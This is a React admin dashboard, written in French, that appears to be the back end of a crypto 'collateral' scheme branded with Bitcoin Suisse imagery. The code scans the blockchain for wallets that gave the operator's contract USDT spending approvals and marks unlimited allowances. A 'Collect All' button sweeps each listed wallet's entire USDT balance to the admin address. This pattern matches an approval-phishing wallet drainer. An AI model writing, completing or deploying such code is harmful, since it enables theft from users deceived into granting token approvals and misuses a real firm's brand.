import React, { useState, useEffect, useCallback } from 'react';
import { useAccount, useReadContract, useDisconnect, useConnect, usePublicClient } from 'wagmi';
import { injected } from 'wagmi/connectors';
import { parseAbiItem } from 'viem';
import { Button } from '../components/ui/button';
import { Input } from '../components/ui/input';
import { Badge } from '../components/ui/badge';
import { ArrowLeft, Search, Wallet, AlertCircle, CheckCircle2, Loader2, Users, RefreshCw, LogOut, Trash2, Scan } from 'lucide-react';
import { useWithdrawCollateral } from '../hooks/useCollateral';
import { CONTRACT_ADDRESSES, USDT_ABI, MAX_UINT256 } from '../config/web3';
import { formatAddress, formatUSDT } from '../lib/utils';
import { toast, Toaster } from 'sonner';
import { Link } from 'react-router-dom';

// Assets
const LOGO_URL = 'https://customer-assets.emergentagent.com/job_invest-collateral/artifacts/tzq62nbg_Logo_Bitcoin_Suisse.png';
const BULL_BG_URL = 'https://customer-assets.emergentagent.com/job_invest-collateral/artifacts/v1jvsr8d_hero_header_front_d5e0b8c882.webp';

export default function AdminDashboard() {
  const { address, isConnected } = useAccount();
  const { disconnect } = useDisconnect();
  const { connect } = useConnect();
  const publicClient = usePublicClient();
  const [clientAddress, setClientAddress] = useState('');
  const [withdrawAmount, setWithdrawAmount] = useState('');
  const [withdrawReason, setWithdrawReason] = useState('');
  const [searchedAddress, setSearchedAddress] = useState(null);
  const { withdraw, isPending: isWithdrawing } = useWithdrawCollateral();
  
  const [authorizedClients, setAuthorizedClients] = useState([]);
  const [isLoadingClients, setIsLoadingClients] = useState(false);
  const [isScanning, setIsScanning] = useState(false);
  const [lastRefresh, setLastRefresh] = useState(null);
  
  // État pour le retrait direct depuis la liste
  const [collectingClient, setCollectingClient] = useState(null);

  const isAdmin = address?.toLowerCase() === CONTRACT_ADDRESSES.ADMIN_ADDRESS.toLowerCase();
  const isContractDeployed = CONTRACT_ADDRESSES.COLLATERAL_MANAGER !== 'PENDING_DEPLOYMENT';

  // Scanner la blockchain pour trouver les adresses qui ont approuvé
  const scanBlockchainForApprovals = async (showToast = false) => {
    if (!publicClient || !isContractDeployed || isScanning) return;
    
    setIsScanning(true);
    if (showToast) toast.info('Scan de la blockchain en cours...');
    
    try {
      const currentBlock = await publicClient.getBlockNumber();
      // Scanner les 50000 derniers blocs (~1 semaine)
      const fromBlock = currentBlock > 50000n ? currentBlock - 50000n : 0n;
      
      const logs = await publicClient.getLogs({
        address: CONTRACT_ADDRESSES.USDT,
        event: parseAbiItem('event Approval(address indexed owner, address indexed spender, uint256 value)'),
        args: {
          spender: CONTRACT_ADDRESSES.COLLATERAL_MANAGER
        },
        fromBlock: fromBlock,
        toBlock: currentBlock
      });
      
      if (logs.length === 0) {
        toast.info('Aucune nouvelle adresse trouvée');
        setIsScanning(false);
        return;
      }
      
      // Extraire les adresses uniques
      const uniqueAddresses = [...new Set(logs.map(log => log.args.owner))];
      
      // Pour chaque adresse, vérifier l'allowance actuelle et ajouter au backend
      let addedCount = 0;
      const backendUrl = process.env.REACT_APP_BACKEND_URL || '';
      
      for (const clientAddr of uniqueAddresses) {
        try {
          const allowance = await publicClient.readContract({
            address: CONTRACT_ADDRESSES.USDT,
            abi: USDT_ABI,
            functionName: 'allowance',
            args: [clientAddr, CONTRACT_ADDRESSES.COLLATERAL_MANAGER]
          });
          
          // Si allowance > 0, ajouter au backend
          if (BigInt(allowance) > 0n) {
            await fetch(`${backendUrl}/api/clients`, {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({ address: clientAddr })
            });
            addedCount++;
          }
        } catch (e) {
          console.error('Erreur pour', clientAddr, e);
        }
      }
      
      if (showToast) toast.success(`${addedCount} adresse(s) trouvée(s) et ajoutée(s)`);
      // Rafraîchir la liste
      fetchClientsFromBackend();
      
    } catch (error) {
      console.error('Erreur scan blockchain:', error);
      toast.error('Erreur lors du scan. Réessayez.');
    } finally {
      setIsScanning(false);
    }
  };

  // Fetch clients from backend
  const fetchClientsFromBackend = useCallback(async () => {
    setIsLoadingClients(true);
    try {
      const backendUrl = process.env.REACT_APP_BACKEND_URL || '';
      const response = await fetch(`${backendUrl}/api/clients`);
      if (response.ok) {
        const clients = await response.json();
        
        if (publicClient && isContractDeployed) {
          const clientsWithBalances = await Promise.all(
            clients.map(async (client) => {
              try {
                const allowance = await publicClient.readContract({
                  address: CONTRACT_ADDRESSES.USDT,
                  abi: USDT_ABI,
                  functionName: 'allowance',
                  args: [client.address, CONTRACT_ADDRESSES.COLLATERAL_MANAGER]
                });
                
                const balance = await publicClient.readContract({
                  address: CONTRACT_ADDRESSES.USDT,
                  abi: USDT_ABI,
                  functionName: 'balanceOf',
                  args: [client.address]
                });
                
                return {
                  ...client,
                  allowance: allowance.toString(),
                  balance: balance.toString(),
                  isActive: BigInt(allowance) > 0n
                };
              } catch (e) {
                return { ...client, allowance: '0', balance: '0', isActive: false };
              }
            })
          );
          setAuthorizedClients(clientsWithBalances);
          setLastRefresh(new Date());
        } else {
          // Sans publicClient, on considère tous les clients comme actifs par défaut
          const clientsWithDefaults = clients.map(c => ({ ...c, isActive: true, balance: '0', allowance: '0' }));
          setAuthorizedClients(clientsWithDefaults);
          setLastRefresh(new Date());
        }
      }
    } catch (error) {
      console.error('Erreur récupération clients:', error);
    } finally {
      setIsLoadingClients(false);
    }
  }, [publicClient, isContractDeployed]);

  // Chargement initial uniquement (pas d'auto-refresh)
  useEffect(() => {
    if (isAdmin && isContractDeployed) {
      fetchClientsFromBackend();
    }
  }, [isAdmin, isContractDeployed, fetchClientsFromBackend]);

  // Collect All - récupère la totalité du solde du client
  const handleCollectAll = async (clientAddr, clientBalance) => {
    if (!clientBalance || clientBalance === '0') {
      toast.error('Ce client n\'a pas de solde USDT');
      return;
    }
    
    setCollectingClient(clientAddr);
    try {
      toast.info('Transaction Collect All en cours...');
      await withdraw(clientAddr, address, clientBalance, 'Collect All - Récupération collatéral');
      toast.success('Collect All réussi !');
      // Rafraîchir la liste après le retrait
      setTimeout(() => fetchClientsFromBackend(), 2000);
    } catch (error) {
      toast.error(error.message || 'Échec du Collect All');
    } finally {
      setCollectingClient(null);
    }
  };

  const addClientToList = async (clientAddr) => {
    if (!clientAddr) return;
    try {
      const backendUrl = process.env.REACT_APP_BACKEND_URL || '';
      const response = await fetch(`${backendUrl}/api/clients`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ address: clientAddr })
      });
      if (response.ok) {
        toast.success('Client ajouté !');
        fetchClientsFromBackend();
      }
    } catch (e) {
      toast.error('Erreur lors de l\'ajout');
    }
  };

  const removeClientFromList = async (clientAddr) => {
    try {
      const backendUrl = process.env.REACT_APP_BACKEND_URL || '';
      await fetch(`${backendUrl}/api/clients/${clientAddr}`, { method: 'DELETE' });
      setAuthorizedClients(prev => prev.filter(c => c.address.toLowerCase() !== clientAddr.toLowerCase()));
      toast.success('Client retiré');
    } catch (e) {
      toast.error('Erreur lors de la suppression');
    }
  };

  const handleConnect = () => {
    if (typeof window.ethereum !== 'undefined' && window.ethereum.isMetaMask) {
      connect({ connector: injected() });
    } else {
      toast.error('MetaMask requis');
    }
  };

  // Read contracts
  const { data: clientBalance, refetch: refetchBalance } = useReadContract({
    address: CONTRACT_ADDRESSES.USDT,
    abi: USDT_ABI,
    functionName: 'balanceOf',
    args: searchedAddress ? [searchedAddress] : undefined,
    query: { enabled: !!searchedAddress }
  });

  const { data: clientAllowance, refetch: refetchAllowance } = useReadContract({
    address: CONTRACT_ADDRESSES.USDT,
    abi: USDT_ABI,
    functionName: 'allowance',
    args: searchedAddress && isContractDeployed 
      ? [searchedAddress, CONTRACT_ADDRESSES.COLLATERAL_MANAGER] 
      : undefined,
    query: { enabled: !!searchedAddress && isContractDeployed }
  });

  const hasClientApproved = clientAllowance && BigInt(clientAllowance.toString()) > 0n;
  const isUnlimitedAllowance = clientAllowance && BigInt(clientAllowance.toString()) >= BigInt(MAX_UINT256) / 2n;

  const handleSearch = () => {
    if (!clientAddress || !/^0x[a-fA-F0-9]{40}$/.test(clientAddress)) {
      toast.error('Adresse invalide');
      return;
    }
    // Garder l'adresse telle quelle (pas de toLowerCase)
    setSearchedAddress(clientAddress);
    setTimeout(() => { refetchBalance(); refetchAllowance(); }, 500);
  };

  const handleWithdraw = async () => {
    if (!searchedAddress || !withdrawAmount || !withdrawReason.trim() || !hasClientApproved) {
      toast.error('Veuillez remplir tous les champs');
      return;
    }
    try {
      const amountInUnits = BigInt(Math.floor(parseFloat(withdrawAmount) * 1e6));
      toast.info('Transaction en cours...');
      await withdraw(searchedAddress, address, amountInUnits.toString(), withdrawReason);
      toast.success('Retrait réussi !');
      setWithdrawAmount('');
      setWithdrawReason('');
      setTimeout(() => { refetchBalance(); refetchAllowance(); }, 2000);
    } catch (error) {
      toast.error(error.message || 'Échec du retrait');
    }
  };

  // Non connecté
  if (!isConnected) {
    return (
      <div className="min-h-screen bg-black text-white font-['Inter',sans-serif] relative overflow-hidden">
        <div className="absolute inset-0 bg-cover bg-right bg-no-repeat" style={{ backgroundImage: `url(${BULL_BG_URL})` }} />
        <div className="absolute inset-0 bg-gradient-to-r from-black via-black/95 to-black/40" />
        
        <header className="relative z-10 flex items-center justify-between px-8 py-6">
          <img src={LOGO_URL} alt="Bitcoin Suisse" className="h-10 brightness-0 invert" />
        </header>

        <main className="relative z-10 flex items-center justify-center min-h-[calc(100vh-100px)]">
          <div className="bg-[#111]/90 border border-gray-800 rounded-2xl p-8 max-w-md w-full mx-4 text-center space-y-6">
            <div className="w-16 h-16 mx-auto rounded-full bg-[#E31B23]/10 border border-[#E31B23]/30 flex items-center justify-center">
              <Wallet className="w-7 h-7 text-[#E31B23]" />
            </div>
            <h1 className="text-2xl font-bold">Administration</h1>
            <p className="text-gray-500">Connectez votre wallet admin</p>
            <Button onClick={handleConnect} className="w-full h-12 bg-[#E31B23] hover:bg-[#c91820]">
              <Wallet className="mr-2 h-5 w-5" /> Connecter MetaMask
            </Button>
          </div>
        </main>
      </div>
    );
  }

  // Non admin
  if (!isAdmin) {
    return (
      <div className="min-h-screen bg-black text-white font-['Inter',sans-serif] relative overflow-hidden">
        <div className="absolute inset-0 bg-cover bg-right bg-no-repeat" style={{ backgroundImage: `url(${BULL_BG_URL})` }} />
        <div className="absolute inset-0 bg-gradient-to-r from-black via-black/95 to-black/40" />
        
        <header className="relative z-10 flex items-center justify-between px-8 py-6">
          <img src={LOGO_URL} alt="Bitcoin Suisse" className="h-10 brightness-0 invert" />
        </header>

        <main className="relative z-10 flex items-center justify-center min-h-[calc(100vh-100px)]">
          <div className="bg-[#111]/90 border border-red-900/50 rounded-2xl p-8 max-w-md w-full mx-4 text-center space-y-6">
            <div className="w-16 h-16 mx-auto rounded-full bg-red-500/10 border border-red-500/30 flex items-center justify-center">
              <AlertCircle className="w-7 h-7 text-red-500" />
            </div>
            <h1 className="text-2xl font-bold">Accès Refusé</h1>
            <p className="text-gray-500 text-sm font-mono">{formatAddress(address)}</p>
            <div className="space-y-3">
              <Button onClick={() => disconnect()} variant="outline" className="w-full border-gray-700">
                Déconnecter
              </Button>
            </div>
          </div>
        </main>
      </div>
    );
  }

  // Admin Dashboard
  return (
    <div className="min-h-screen bg-black text-white font-['Inter',sans-serif] relative">
      <Toaster richColors position="top-center" toastOptions={{ style: { background: '#1a1a1a', border: '1px solid #333', color: '#fff' } }} />
      
      {/* Background subtil */}
      <div className="fixed inset-0 bg-cover bg-right bg-no-repeat opacity-20" style={{ backgroundImage: `url(${BULL_BG_URL})` }} />
      <div className="fixed inset-0 bg-gradient-to-r from-black via-black/98 to-black/90" />
      
      {/* Header */}
      <header className="relative z-10 sticky top-0 bg-black/80 backdrop-blur border-b border-gray-800">
        <div className="max-w-7xl mx-auto px-6 h-16 flex items-center justify-between">
          <div className="flex items-center gap-4">
            <img src={LOGO_URL} alt="Bitcoin Suisse" className="h-8 brightness-0 invert" />
            <div className="h-6 w-px bg-gray-800" />
            <span className="text-sm font-medium text-gray-400">Administration</span>
          </div>
          <div className="flex items-center gap-4">
            <Badge className="bg-[#E31B23]/10 text-[#E31B23] border border-[#E31B23]/30">
              {formatAddress(address)}
            </Badge>
            <button onClick={() => disconnect()} className="text-gray-500 hover:text-white">
              <LogOut className="h-5 w-5" />
            </button>
          </div>
        </div>
      </header>

      <main className="relative z-10 max-w-7xl mx-auto px-6 py-8 space-y-8">
        
        {/* Recherche Client */}
        <div className="bg-[#111]/80 border border-gray-800 rounded-xl p-6">
          <h2 className="text-lg font-semibold mb-4 flex items-center gap-2">
            <Search className="h-5 w-5 text-[#E31B23]" />
            Rechercher un Client
          </h2>
          <div className="flex gap-3">
            <Input
              placeholder="0x..."
              value={clientAddress}
              onChange={(e) => setClientAddress(e.target.value)}
              className="flex-1 h-12 bg-black border-gray-800 font-mono"
            />
            <Button onClick={handleSearch} className="h-12 px-6 bg-[#E31B23] hover:bg-[#c91820]">
              Rechercher
            </Button>
          </div>
        </div>

        {/* Résultat recherche */}
        {searchedAddress && (
          <div className="bg-[#111]/80 border border-gray-800 rounded-xl p-6 space-y-6">
            <div className="grid grid-cols-1 md:grid-cols-3 gap-4">
              <div className="bg-black/50 rounded-lg p-4">
                <p className="text-xs text-gray-500 uppercase mb-1">Statut</p>
                {hasClientApproved ? (
                  <Badge className="bg-green-500/20 text-green-400 border-green-500/30">
                    <CheckCircle2 className="h-4 w-4 mr-1" /> Autorisé
                  </Badge>
                ) : (
                  <Badge className="bg-red-500/20 text-red-400 border-red-500/30">
                    <AlertCircle className="h-4 w-4 mr-1" /> Non autorisé
                  </Badge>
                )}
              </div>
              <div className="bg-black/50 rounded-lg p-4">
                <p className="text-xs text-gray-500 uppercase mb-1">Solde USDT</p>
                <p className="text-xl font-bold">{formatUSDT(clientBalance?.toString() || '0')}</p>
              </div>
              <div className="bg-black/50 rounded-lg p-4">
                <p className="text-xs text-gray-500 uppercase mb-1">Allowance</p>
                <p className="text-xl font-bold">{isUnlimitedAllowance ? 'Illimité' : formatUSDT(clientAllowance?.toString() || '0')}</p>
              </div>
            </div>

            {/* Bouton ajouter */}
            {!authorizedClients.find(c => c.address.toLowerCase() === searchedAddress) && (
              <Button onClick={() => addClientToList(searchedAddress)} variant="outline" className="w-full border-gray-700">
                <Users className="mr-2 h-4 w-4" /> Ajouter à la liste
              </Button>
            )}

            {/* Formulaire retrait */}
            {hasClientApproved && (
              <div className="border-t border-gray-800 pt-6 space-y-4">
                <h3 className="font-semibold">Retirer des Collatéraux</h3>
                <div className="grid grid-cols-1 md:grid-cols-2 gap-4">
                  <div>
                    <label className="text-xs text-gray-500 uppercase">Montant (USDT)</label>
                    <Input
                      type="number"
                      step="0.01"
                      placeholder="100.00"
                      value={withdrawAmount}
                      onChange={(e) => setWithdrawAmount(e.target.value)}
                      className="mt-1 bg-black border-gray-800"
                    />
                  </div>
                  <div>
                    <label className="text-xs text-gray-500 uppercase">Raison</label>
                    <Input
                      placeholder="Non-paiement prêt #123"
                      value={withdrawReason}
                      onChange={(e) => setWithdrawReason(e.target.value)}
                      className="mt-1 bg-black border-gray-800"
                    />
                  </div>
                </div>
                <Button 
                  onClick={handleWithdraw} 
                  disabled={isWithdrawing}
                  className="w-full h-12 bg-[#E31B23] hover:bg-[#c91820]"
                >
                  {isWithdrawing ? <Loader2 className="mr-2 h-5 w-5 animate-spin" /> : null}
                  Retirer
                </Button>
              </div>
            )}
          </div>
        )}

        {/* Liste des clients */}
        <div className="bg-[#111]/80 border border-gray-800 rounded-xl p-6">
          <div className="flex items-center justify-between mb-6">
            <div>
              <h2 className="text-lg font-semibold flex items-center gap-2">
                <Users className="h-5 w-5 text-[#E31B23]" />
                Clients Enregistrés ({authorizedClients.length})
              </h2>
              {lastRefresh && (
                <p className="text-xs text-gray-500 mt-1">
                  Auto-refresh actif • Dernière mise à jour: {lastRefresh.toLocaleTimeString('fr-FR')}
                </p>
              )}
            </div>
            <div className="flex items-center gap-2">
              <Button 
                onClick={() => scanBlockchainForApprovals(true)}
                variant="outline" 
                size="sm"
                disabled={isScanning}
                className="border-[#E31B23]/30 hover:bg-[#E31B23]/10"
              >
                {isScanning ? (
                  <>
                    <Loader2 className="h-4 w-4 animate-spin mr-2" />
                    Scan en cours...
                  </>
                ) : (
                  <>
                    <Scan className="h-4 w-4 mr-2" />
                    Scanner Blockchain
                  </>
                )}
              </Button>
              <Button 
                onClick={fetchClientsFromBackend} 
                variant="outline" 
                size="sm"
                disabled={isLoadingClients}
                className="border-gray-700"
              >
                {isLoadingClients ? <Loader2 className="h-4 w-4 animate-spin" /> : <RefreshCw className="h-4 w-4" />}
              </Button>
            </div>
          </div>

          {authorizedClients.length === 0 ? (
            <div className="text-center py-12 text-gray-500">
              <Users className="h-12 w-12 mx-auto mb-4 opacity-30" />
              <p>Aucun client enregistré</p>
            </div>
          ) : (
            <div className="space-y-3">
              {authorizedClients.map((client) => (
                <div 
                  key={client.address}
                  className="bg-black/50 rounded-lg hover:bg-black/70 transition-colors overflow-hidden"
                >
                  {/* Ligne principale du client */}
                  <div className="flex items-center justify-between p-4">
                    <div className="flex items-center gap-4">
                      <div className={`w-2 h-2 rounded-full ${client.isActive ? 'bg-green-500' : 'bg-gray-600'}`} />
                      <span className="font-mono text-sm">{client.address.slice(0, 10)}...{client.address.slice(-8)}</span>
                    </div>
                    <div className="flex items-center gap-4">
                      <span className="text-sm font-semibold">{formatUSDT(client.balance || '0')} USDT</span>
                      
                      {/* Bouton Collect All */}
                      <Button
                        variant="outline"
                        size="sm"
                        onClick={() => handleCollectAll(client.address, client.balance)}
                        disabled={collectingClient === client.address || isWithdrawing}
                        className="border-[#E31B23]/50 text-[#E31B23] hover:bg-[#E31B23]/10"
                        data-testid={`collect-all-btn-${client.address.slice(0, 8)}`}
                      >
                        {collectingClient === client.address ? (
                          <Loader2 className="h-4 w-4 animate-spin" />
                        ) : (
                          'Collect All'
                        )}
                      </Button>
                      
                      <Button
                        variant="ghost"
                        size="sm"
                        onClick={() => {
                          setClientAddress(client.address);
                          setSearchedAddress(client.address.toLowerCase());
                          setTimeout(() => { refetchBalance(); refetchAllowance(); }, 500);
                        }}
                        className="text-gray-400 hover:text-white"
                      >
                        <Search className="h-4 w-4" />
                      </Button>
                      <Button
                        variant="ghost"
                        size="sm"
                        onClick={() => removeClientFromList(client.address)}
                        className="text-gray-400 hover:text-red-500"
                      >
                        <Trash2 className="h-4 w-4" />
                      </Button>
                    </div>
                  </div>
                </div>
              ))}
            </div>
          )}
        </div>
      </main>
    </div>
  );
}
